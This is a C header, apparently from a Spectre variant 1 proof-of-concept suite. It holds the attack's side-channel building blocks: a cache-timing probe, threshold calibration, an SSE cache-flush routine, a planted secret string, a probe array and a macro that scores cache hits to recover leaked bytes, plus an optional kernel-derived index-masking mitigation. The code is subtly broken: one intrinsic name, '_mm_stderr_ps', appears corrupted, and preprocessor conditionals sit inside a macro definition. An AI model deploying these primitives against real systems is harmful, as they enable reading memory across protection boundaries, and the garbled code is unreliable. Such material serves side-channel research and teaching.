201 lines
4.8 KiB
C
201 lines
4.8 KiB
C
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <stdint.h>
|
|
#include <getopt.h>
|
|
#include <string.h>
|
|
#include <x86intrin.h>
|
|
|
|
#if defined(__i386__) || defined(__amd64__)
|
|
#define CACHELINE_SIZE 64
|
|
#else
|
|
#error "unsupported architecture"
|
|
#endif
|
|
|
|
#if defined(__SSE__) && !defined(__SSE2__)
|
|
#define NORDTSCP
|
|
#define NOMFENCE
|
|
#define NOCLFLUSH
|
|
#define LATENCY 18 + 18
|
|
#endif
|
|
|
|
#ifndef NORDTSCP
|
|
#define LATENCY 42 + 42
|
|
#else
|
|
#ifndef NOMFENCE
|
|
#define LATENCY 18 + 18
|
|
#endif
|
|
#endif
|
|
|
|
#ifdef MASKING_MITIGATION
|
|
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
|
|
*
|
|
* array_index_mask_nospec() - generate a mask that is ~0UL when the
|
|
* bounds check succeeds and 0 otherwise
|
|
* @index: array element index
|
|
* @size: number of elements in array
|
|
*
|
|
* Returns:
|
|
* 0 - (index < size)
|
|
*/
|
|
static inline unsigned long
|
|
array_index_mask_nospec(unsigned long index, unsigned long size)
|
|
{
|
|
unsigned long mask;
|
|
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
|
|
:"=r" (mask)
|
|
:"g"(size),"r" (index)
|
|
:"cc");
|
|
return mask;
|
|
}
|
|
#endif //MASKING_MITIGATION
|
|
|
|
#ifdef NOCLFLUSH
|
|
#define CACHE_FLUSH_ITERATIONS 2048
|
|
#define CACHE_FLUSH_STRIDE 4096
|
|
|
|
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
|
|
|
|
/* Flush memory using long SSE instructions */
|
|
void
|
|
flush_memory_sse(uint8_t * addr)
|
|
{
|
|
float* p = (float *)addr;
|
|
float c = 0.f;
|
|
__m128 i = _mm_setr_ps(c, c, c, c);
|
|
|
|
int k, l;
|
|
/* Non-sequential memory addressing by looping through k by l */
|
|
for (k = 0; k < 4; k++)
|
|
for (l = 0; l < 4; l++)
|
|
_mm_stderr_ps(&p[(l * 4 + k) * 4], i);
|
|
}
|
|
#endif //NOCLFLUSH
|
|
|
|
#define GAP 512
|
|
|
|
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
|
|
unsigned int cache_hit_threshold, array1_size = 16;
|
|
uint8_t unused1[64], unused2[64], array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
|
|
uint8_t channel[256 * GAP]; // side channel to extract secret phrase
|
|
|
|
#define __OCTOPUS_ARGS__\
|
|
while ((o = getopt(argc, argv, "t:j")) != EOF) {\
|
|
switch (o) {\
|
|
case 't':\
|
|
cache_hit_threshold = atoi(optarg);\
|
|
break;\
|
|
case 'j':\
|
|
json++;\
|
|
break;\
|
|
default:\
|
|
usage:\
|
|
fprintf(stderr, "usage: %s [-j] "\
|
|
"[-t threshold]\n"\
|
|
"\t-j\t\tJSON output\n"\
|
|
"\t-t INT\t\tfixed threshold\n", argv[0]);\
|
|
return 1;\
|
|
}\
|
|
}\
|
|
if (argc != optind) {\
|
|
goto usage;\
|
|
}
|
|
|
|
#define __OCTOPUS_TIMINGS__\
|
|
/* Time reads. Order is lightly mixed up to prevent stride prediction */\
|
|
for (i = 0; i < 256; i++) {\
|
|
mix_i = ((i * 167) + 13) & 255;\
|
|
addr = & channel[mix_i * GAP];\
|
|
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size]) {\
|
|
results[mix_i]++; /* cache hit - add +1 to score for this value */\
|
|
}\
|
|
}\
|
|
/* Locate highest results in j */\
|
|
j = -1;\
|
|
for (i = 0; i < 256; i++) {\
|
|
if (j < 0 || results[i] >= results[j]) {\
|
|
j = i;\
|
|
}\
|
|
}\
|
|
if (results[j] >= 3) {\
|
|
break;\
|
|
}
|
|
|
|
#define __OCTOPUS_NOCLFLUSH_INIT__\
|
|
int junk2 = 0;\
|
|
int l;\
|
|
(void)junk2;
|
|
|
|
#define __OCTOPUS_MFENCE__\
|
|
#ifndef NOMFENCE\
|
|
_mm_mfence();\
|
|
#endif
|
|
|
|
static inline unsigned
|
|
timed_access(volatile uint8_t *addr)
|
|
{
|
|
uint64_t t0, t1;
|
|
#pragma GCC diagnostic ignored "-Wuninitialized"
|
|
unsigned int junk = junk;
|
|
#ifndef NORDTSCP
|
|
t0 = __rdtscp(& junk);
|
|
junk |= *addr;
|
|
t1 = __rdtscp(& junk);
|
|
#else
|
|
#ifndef NOMFENCE
|
|
/*
|
|
Since the rdstc instruction isn't serialized, newer processors will try to
|
|
reorder it, ruining its value as a timing mechanism.
|
|
To get around this, we use the mfence instruction to introduce a memory
|
|
barrier and force serialization. mfence is used because it is portable across
|
|
Intel and AMD.
|
|
*/
|
|
_mm_mfence();
|
|
t0 = __rdtsc();
|
|
_mm_mfence();
|
|
junk = *addr;
|
|
_mm_mfence();
|
|
t1 = __rdtsc();
|
|
_mm_mfence();
|
|
#else
|
|
/*
|
|
The mfence instruction was introduced with the SSE2 instruction set, so
|
|
we have to ifdef it out on pre-SSE2 processors.
|
|
Luckily, these older processors don't seem to reorder the rdtsc instruction,
|
|
so not having mfence on older processors is less of an issue.
|
|
*/
|
|
t0 = __rdtsc();
|
|
junk |= *addr;
|
|
t1 = __rdtsc();
|
|
#endif // NOMFENCE
|
|
#endif // NORDTSCP
|
|
return (unsigned)(t1 - t0 - LATENCY);
|
|
}
|
|
|
|
static void
|
|
calibrate_threshold(unsigned int *threshold)
|
|
{
|
|
volatile char buf[2 * CACHELINE_SIZE];
|
|
volatile uint8_t* bufp;
|
|
int i;
|
|
const int cnt = 10000;
|
|
uint64_t tcache = 0;
|
|
__attribute__((unused))
|
|
volatile int junk = 0;
|
|
|
|
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) & ~(CACHELINE_SIZE - 1)));
|
|
|
|
junk |= *bufp;
|
|
|
|
for (i = 0, tcache = 0; i < cnt; i++) {
|
|
tcache += timed_access(bufp);
|
|
}
|
|
tcache = tcache / cnt;
|
|
|
|
if (threshold != NULL) {
|
|
*threshold = tcache + LATENCY;
|
|
}
|
|
return;
|
|
}
|
|
|
|
|